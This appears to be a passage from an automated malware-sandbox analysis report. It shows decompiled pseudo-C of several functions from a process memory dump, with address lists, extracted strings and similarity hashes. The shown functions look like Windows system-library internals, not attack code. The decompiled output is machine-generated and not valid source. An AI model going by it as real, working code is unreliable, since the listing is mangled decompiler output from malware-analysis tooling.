							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00FC2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00FBB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00FBFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00FC7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0105FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0106e547
0x0106e549
0x0106e54f
0x0106e553
0x0106e557
0x0106e55a
0x0106e55c
0x0106e55f
0x0106e561
0x0106e567
0x0106e56b
0x0106e7e2
0x00000000
0x0106e571
0x0106e575
0x0106e577
0x0106e57b
0x0106e57c
0x0106e57d
0x0106e57e
0x0106e57f
0x0106e588
0x0106e58f
0x0106e591
0x0106e592
0x0106e592
0x0106e596
0x0106e59e
0x0106e5a0
0x0106e5a6
0x0106e61d
0x0106e61d
0x0106e621
0x0106e623
0x0106e630
0x0106e630
0x0106e7e6
0x0106e7eb
0x0106e7ed
0x0106e7f4
0x0106e7fa
0x0106e7ff
0x0106e7ff
0x0106e80a
0x0106e812
0x0106e812
0x0106e5ab
0x0106e5b4
0x0106e5b9
0x0106e5be
0x0106e5c0
0x0106e5c2
0x0106e5c8
0x0106e5c9
0x0106e5cb
0x0106e5cc
0x0106e5d5
0x0106e5e4
0x0106e5f1
0x0106e5f8
0x0106e5f8
0x0106e5d5
0x0106e602
0x0106e616
0x0106e63d
0x0106e644
0x0106e64d
0x0106e652
0x0106e657
0x0106e659
0x0106e65b
0x0106e661
0x0106e662
0x0106e664
0x0106e665
0x0106e66e
0x0106e67d
0x0106e68a
0x0106e691
0x0106e691
0x0106e66e
0x0106e6b0
0x00000000
0x0106e6b6
0x0106e6bd
0x0106e6c7
0x0106e6d7
0x0106e6d9
0x0106e6db
0x0106e6de
0x0106e6e3
0x0106e6f3
0x0106e6fc
0x0106e700
0x0106e700
0x0106e704
0x0106e70a
0x0106e70a
0x0106e713
0x0106e716
0x0106e719
0x0106e720
0x0106e761
0x0106e76b
0x0106e774
0x0106e77a
0x0106e77a
0x0106e78a
0x0106e791
0x0106e799
0x0106e79b
0x0106e79f
0x0106e7aa
0x0106e7c0
0x0106e7ac
0x0106e7b2
0x0106e7b9
0x0106e7b9
0x0106e7c7
0x0106e806
0x00000000
0x0106e7c9
0x0106e7d1
0x0106e7d8
0x00000000
0x0106e7d8
0x00000000
0x00000000
0x0106e722
0x0106e72e
0x0106e748
0x0106e74c
0x0106e754
0x0106e756
0x0106e75c
0x0106e75c
0x00000000
0x0106e75c
0x0106e758
0x0106e758
0x00000000
0x0106e758
0x0106e750
0x00000000
0x00000000
0x0106e752
0x00000000
0x0106e752
0x0106e730
0x0106e735
0x0106e73d
0x0106e73f
0x00000000
0x00000000
0x0106e741
0x0106e741
0x00000000
0x0106e741
0x0106e739
0x00000000
0x00000000
0x0106e73b
0x00000000
0x0106e73b
0x0106e722
0x0106e720
0x0106e6b0
0x0106e618
0x00000000
0x0106e618

Strings

`, xrefs: 0106E670
`, xrefs: 0106E5D7

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: f7d1241288b2db1b2576b0976aa0989866e5e26c18b5077560c31f973d432698
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 6491AF752043429FE764CE29C841B5BBBE9BF84714F14896DFAD9CB280E774E908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 010251BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x10805f0);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010253CA(0);
						return E00FFD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00FEF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00FC3690(1, _t117, 0xf81810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00FEAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00FC4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00FEAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0102500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00FE9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x010251be
0x010251c3
0x010251c8
0x010251cd
0x010251d0
0x010251d3
0x010251d8
0x010251db
0x010251de
0x010251e0
0x010251e3
0x010251e6
0x010251e8
0x01025342
0x01025351
0x01025356
0x0102535a
0x01025360
0x01025363
0x01025366
0x01025369
0x01025369
0x0102536b
0x0102536b
0x01025370
0x010253a3
0x010253a4
0x010253a6
0x010253ab
0x010253ab
0x010253ae
0x010253ae
0x010253b5
0x010253bf
0x010253bf
0x01025375
0x01025396
0x010253a0
0x010253a0
0x00000000
0x01025396
0x01025377
0x01025379
0x0102537f
0x0102538c
0x01025390
0x00000000
0x01025390
0x010251ee
0x010251f1
0x01025301
0x01025310
0x01025315
0x01025318
0x0102531b
0x01025320
0x0102532e
0x01025331
0x00000000
0x01025331
0x01025328
0x01025329
0x00000000
0x01025329
0x010251fa
0x01025235
0x01025236
0x01025239
0x0102523f
0x01025240
0x01025241
0x01025242
0x01025246
0x01025247
0x0102524e
0x01025251
0x01025267
0x01025269
0x0102526e
0x0102527d
0x0102527e
0x01025281
0x01025282
0x01025287
0x01025288
0x0102528a
0x0102528f
0x01025294
0x00000000
0x00000000
0x0102529a
0x0102529c
0x0102529e
0x0102529e
0x010252a4
0x010252b0
0x00000000
0x00000000
0x010252ba
0x010252bc
0x010252bc
0x010252d4
0x010252d9
0x010252dc
0x010252e1
0x00000000
0x00000000
0x010252e7
0x010252f4
0x00000000
0x010252f4
0x01025270
0x00000000
0x01025270
0x010251fc
0x010251fd
0x01025202
0x01025203
0x01025205
0x0102520a
0x0102520f
0x00000000
0x00000000
0x0102521b
0x01025226
0x0102522b
0x0102521d
0x0102521d
0x01025222
0x01025222
0x0102522d
0x00000000

Strings

Legacy, xrefs: 01025226
UEFI, xrefs: 0102521D

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 60b738e46c2c5344ce1c5c15c7490da33cd768f1938d395563ebb3ff595b9e4e
Instruction ID: c0fb75550857f3ec9758cff975de0e1d09d40db1e484b1482e17d0452548bf76
Opcode Fuzzy Hash: 60b738e46c2c5344ce1c5c15c7490da33cd768f1938d395563ebb3ff595b9e4e
Instruction Fuzzy Hash: B6515C71A006199FDB24DFA88D40BEDBBF8FF49700F14806DE689EB291D7719900DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FAB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x107f7a8);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00FFD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00FED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00FEF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00FFDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00FEB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00FEB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00FEE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00FEA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00fab171
0x00fab171
0x00fab171
0x00fab171
0x00fab171
0x00fab176
0x00fab17b
0x00fab180
0x00fab186
0x00fab18f
0x00fab198
0x00fab1a4
0x00fab1aa
0x01004802
0x01004802
0x01004805
0x0100480c
0x0100480e
0x00fab1d1
0x00fab1d3
0x00fab1de
0x00fab1de
0x01004817
0x0100481e
0x01004820
0x01004822
0x01004822
0x01004824
0x01004824
0x0100482a
0x00000000
0x00000000
0x01004835
0x0100483a
0x0100483d
0x0100483f
0x01004842
0x01004842
0x01004842
0x01004846
0x0100484c
0x0100484e
0x01004851
0x01004851
0x01004853
0x01004854
0x01004854
0x01004858
0x0100485a
0x0100485a
0x0100485d
0x0100485f
0x01004861
0x01004861
0x01004866
0x0100486b
0x0100486e
0x01004871
0x01004876
0x01004876
0x01004878
0x0100487b
0x01004884
0x01004884
0x00000000
0x0100487d
0x0100487d
0x01004882
0x01004889
0x01004889
0x0100488f
0x01004891
0x010048e0
0x010048e2
0x010048e4
0x010048e4
0x010048e7
0x010048e7
0x010048ed
0x010048f4
0x010048f6
0x01004951
0x01004951
0x01004953
0x01004953
0x01004956
0x01004956
0x01004958
0x01004959
0x01004959
0x0100495d
0x0100495d
0x0100495f
0x0100495f
0x01004965
0x01004969
0x010049ba
0x010049ba
0x010049c1
0x010049c5
0x010049cc
0x010049d4
0x010049d7
0x010049da
0x010049e4
0x010049e5
0x010049f3
0x01004a02
0x00000000
0x01004a02
0x01004972
0x01004974
0x00000000
0x00000000
0x01004976
0x01004979
0x01004982
0x01004983
0x01004984
0x0100498b
0x0100498d
0x01004991
0x01004993
0x01004999
0x0100499d
0x010049a2
0x010049a2
0x010049a2
0x01004999
0x010049ac
0x00000000
0x010049b3
0x010048f8
0x010048fe
0x00000000
0x00000000
0x00000000
0x010048fe
0x01004895
0x0100489c
0x010048ad
0x010048b2
0x010048b5
0x010048b7
0x010048ba
0x010048bc
0x010048c6
0x010048c6
0x010048cb
0x010048d1
0x010048d4
0x010048d8
0x010048d8
0x00000000
0x010048d8
0x010048be
0x010048c0
0x00000000
0x00000000
0x010048c2
0x00000000
0x00000000
0x00000000
0x010048c4
0x00000000
0x01004882
0x0100487b
0x01004904
0x01004906
0x00000000
0x00000000
0x01004908
0x0100490e
0x00000000
0x00000000
0x01004910
0x01004917
0x01004917
0x00000000
0x01004917
0x00fab1ba
0x010047f9
0x010047fc
0x00000000
0x00000000
0x00000000
0x010047fc
0x00fab1c0
0x00fab1c0
0x00fab1c3
0x00fab1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 010048AD

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 41cc6ebf1667e950f531e003fa1e03a784c8ca58a5692853a462bb2afa80c8c9
Instruction ID: 1b51b70deaf8e75e5588aca68e791f3f0e17b94b16452cc5f243cf61c28fcd2a
Opcode Fuzzy Hash: 41cc6ebf1667e950f531e003fa1e03a784c8ca58a5692853a462bb2afa80c8c9
Instruction Fuzzy Hash: 7451E071D002598EEB32CF688845BAEBBF1BF00310F1041ADEA99EB2C2D7754A45DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FCB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FCB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x109d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00FC7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01078CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00FE9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00FEB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00FECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00FC7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01078F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00FEAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1098628; // 0x0
								_v68 = _t77;
								_t78 =  *0x109862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1098628; // 0x0
							_t116 =  *0x109862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x00fcb94c
0x00fcb956
0x00fcb95c
0x00fcb95e
0x00fcb964
0x00fcb969
0x00fcb96d
0x00fcb96d
0x00fcb970
0x00fcb974
0x00fcb97a
0x00fcbadf
0x00fcbadf
0x00fcbae2
0x00fcbae4
0x00fcbae6
0x00fcbaf0
0x01012cb8
0x00fcbaf6
0x00fcbaf6
0x00fcbaf6
0x00fcbafd
0x00fcbb1f
0x00fcbb1f
0x00fcbaff
0x00fcbb00
0x00fcbb00
0x00fcbb03
0x00fcbb03
0x00fcbacb
0x00fcbacf
0x00fcbad0
0x00fcbad1
0x00fcbadc
0x00fcbadc
0x00fcb980
0x00fcb980
0x00fcb988
0x00fcb98b
0x00fcb98d
0x00fcb990
0x00fcb993
0x00fcb999
0x00fcb99b
0x00fcb9a1
0x00fcb9a5
0x00fcb9aa
0x00fcb9b0
0x00fcb9bb
0x00fcb9c0
0x00fcb9c3
0x00fcb9ca
0x00fcb9cc
0x00fcb9cf
0x00fcb9d3
0x00fcb9d7
0x00fcba94
0x00fcba94
0x00fcba98
0x00fcbaa3
0x01012ccb
0x00fcbaa9
0x00fcbaa9
0x00fcbaa9
0x00fcbab1
0x01012cd5
0x01012cdd
0x01012cdd
0x00fcbabb
0x00fcbabc
0x00fcbac2
0x00fcbac3
0x00fcbac3
0x00fcbac6
0x00000000
0x00fcb9dd
0x00fcb9dd
0x00fcb9e7
0x00fcb9e7
0x00fcb9ec
0x00fcb9ec
0x00fcb9f1
0x00fcb9f5
0x00fcb9fa
0x00fcba00
0x00fcba0c
0x00fcba10
0x00fcba10
0x00fcba12
0x00fcba18
0x00000000
0x00000000
0x00fcbb26
0x00fcbb26
0x00fcba1e
0x00fcba1e
0x00fcba23
0x00fcba25
0x00fcba2c
0x00fcba30
0x00fcba35
0x00fcba35
0x00fcba41
0x00fcba46
0x00fcba4c
0x00fcba50
0x00fcba54
0x00fcba6a
0x00fcba6e
0x00fcba70
0x00fcba74
